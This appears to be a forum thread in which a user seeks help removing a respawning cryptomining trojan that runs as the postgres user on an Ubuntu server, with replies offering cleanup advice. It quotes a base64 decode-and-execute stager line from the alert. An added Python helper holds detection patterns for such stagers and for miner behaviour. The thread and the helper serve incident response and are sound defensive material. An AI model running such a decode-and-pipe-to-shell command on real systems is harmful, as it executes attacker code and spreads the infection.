Asking the experts for help: Ubuntu 16.04 infected with a trojan, can't clean it out completely

2020-06-11 11:49:14 +08:00
15399905591

With top I see a process like this; after I kill it, it reappears after a while

PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND
6625 postgres 20 0 2435624 2.035g 4 R 100.0 52.7 1008:52 yYGsf4

Aliyun raised an alert on a script like this, but I can't find any cron job for it. I suspect PostgreSQL is the cause, but I don't know where to start looking:

:sh -c echo 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 |base64 -d|bash

1314 views
Node: Ubuntu
15 replies
id7368
2020-06-11 12:01:40 +08:00
You have to delete the file as well. Use ps to find where the actual file lives; it's most likely in the tmp folder. Go there and look for folders with gibberish names.
15399905591
2020-06-11 12:22:12 +08:00
@id7368 This one seems to have been downloaded; I can't find where it gets launched from.
superrichman
2020-06-11 12:26:51 +08:00
crontab -l
ghostwwg
2020-06-11 13:05:46 +08:00
Give up, reinstalling is the way to go.
vinsec
2020-06-11 13:18:09 +08:00
lsof -p pid to check the files it has open, then lsof file on those to see which other processes are associated with them.
7654
2020-06-11 13:20:17 +08:00
Its steps are all in that base64 blob; follow the trail.
wooyuntest
2020-06-11 13:29:49 +08:00
It most likely got in through some vulnerable service and then planted a mining trojan; there's probably another script too. Check the tmp directory, crontab, SSH public keys and the firewall. If you can't sort it out, I can log in and take a look.
4linuxfun
2020-06-11 13:32:43 +08:00
First find out how it got in, then reinstall.
limboMu
2020-06-11 13:58:22 +08:00
A few days ago I was playing with redis exposed to the public internet, and I also got a mining trojan planted.
limboMu
2020-06-11 13:58:57 +08:00
@limboMu But I had started it with docker, so I just killed the container and that was it. Why not use containers?
Kelan
2020-06-11 14:00:35 +08:00
The USER column already makes it clear what happened.

Also, what does this have to do with Python?
asilin
2020-06-11 14:04:42 +08:00
It's simple: since the intrusion came in via the postgres user, back up the postgres service, stop the crontab service, use find to delete all files owned by the postgres user, kill all of the postgres user's processes, and then delete the postgres user.

As long as the postgres user can't escalate to root, it can't do any real damage; get rid of the user and you're done.
migu123456
2020-06-11 14:31:23 +08:00
Shut down the Aliyun service and kill it. Very likely you enabled Aliyun's SSH certificate access; you can delete it in the console.
lyi4ng
2020-06-11 20:33:49 +08:00
Decode the base64 yourself and have a look. The rough flow is: it touches crontab, kills a whole bunch of processes by process name, kills another bunch by network connection target, then modifies your /etc/hosts, and finally deletes clear.sh, which from the name looks like a cleanup script; no idea where it came from.

With ryuk and tor2web in there, and looking at your situation, it should be a mining trojan.

As for it reappearing after you kill it: the big blob you posted is itself the daemon, so kill that first, okay~ Have a look at this https://www.cnblogs.com/royfans/p/12722792.html

As for the rest, init.d, systemd.d, LKM, ptrace and the like, they probably haven't put that much effort into you; it's just one of those open-source mining scripts you see everywhere.
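A defender's triage helper written for this thread (an added example, not code from any poster): it decodes an echo | base64 -d | bash alert line of the shape the OP quoted, tags the behaviours lyi4ng lists in the decoded script (crontab, kill by process name, /etc/hosts, clear.sh), and flags top rows like the yYGsf4 process running as postgres at 100% CPU. The payload, alert line and top output are constructed samples; the indicator names, the service-account list and the CPU threshold are my own assumptions.

```python
import base64
import re

# Alert shape quoted in the thread: sh -c echo <base64> | base64 -d | bash
B64_STAGER = re.compile(r"echo\s+([A-Za-z0-9+/=]{16,})\s*\|\s*base64\s+(?:-d|--decode)\s*\|\s*(?:ba)?sh\b")
# Behaviours lyi4ng describes in the decoded script, mapped to coarse indicator names (assumed)
INDICATORS = {
    "cron_persistence": re.compile(r"\bcrontab\b"),
    "hosts_tampering": re.compile(r"/etc/hosts\b"),
    "process_killing": re.compile(r"\b(?:p?kill|killall)\b"),
    "cleanup_script": re.compile(r"\bclear\.sh\b"),
}

def decode_stager(cmdline):
    """Return the decoded payload of an echo|base64 -d|bash one-liner, or None."""
    m = B64_STAGER.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-8", "replace")
    except ValueError:  # binascii.Error subclasses ValueError: not valid base64
        return None

def classify(payload):
    """Sorted indicator names whose pattern appears in the decoded script."""
    return sorted(name for name, rx in INDICATORS.items() if rx.search(payload))

def looks_random(name):
    """Short mixed-case alphanumerics with a digit (e.g. yYGsf4) are typical dropped-miner names."""
    return bool(re.fullmatch(r"[A-Za-z0-9]{5,8}", name) and re.search(r"[A-Z]", name)
                and re.search(r"[a-z]", name) and re.search(r"\d", name))

def flag_top_rows(top_text, cpu_threshold=90.0, service_users=("postgres", "redis", "mysql")):
    """Flag top rows where a service account runs a random-named process at high CPU."""
    flagged = []
    for line in top_text.splitlines():
        parts = line.split()
        if len(parts) < 12 or not parts[0].isdigit():  # skip the header line
            continue
        pid, user, cpu, name = int(parts[0]), parts[1], float(parts[8]), parts[11]
        if user in service_users and cpu >= cpu_threshold and looks_random(name):
            flagged.append((pid, user, name))
    return flagged

# Constructed samples; the thread's real payload is elided from the page
SAMPLE_PAYLOAD = "#!/bin/sh\ncrontab -l\ngrep tor2web /etc/hosts\npkill -f yYGsf4\nrm -f clear.sh\n"
SAMPLE_ALERT = "sh -c echo " + base64.b64encode(SAMPLE_PAYLOAD.encode()).decode() + " |base64 -d|bash"
SAMPLE_TOP = """PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND
1234 postgres 20 0 320000 30000 28000 S 0.3 0.8 2:10.00 postgres
6625 postgres 20 0 2435624 2.035g 4 R 100.0 52.7 1008:52 yYGsf4"""
```

Running classify(decode_stager(SAMPLE_ALERT)) and flag_top_rows(SAMPLE_TOP) gives the indicator list and the single flagged postgres process; the decoded text is what you then read by hand to find the crontab entries and hosts changes to undo.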
15399905591
2020-06-19 18:08:55 +08:00
@lyi4ng Thanks a lot, it's exactly the same as in the article you linked.

https://www.v2ex.com/t/680615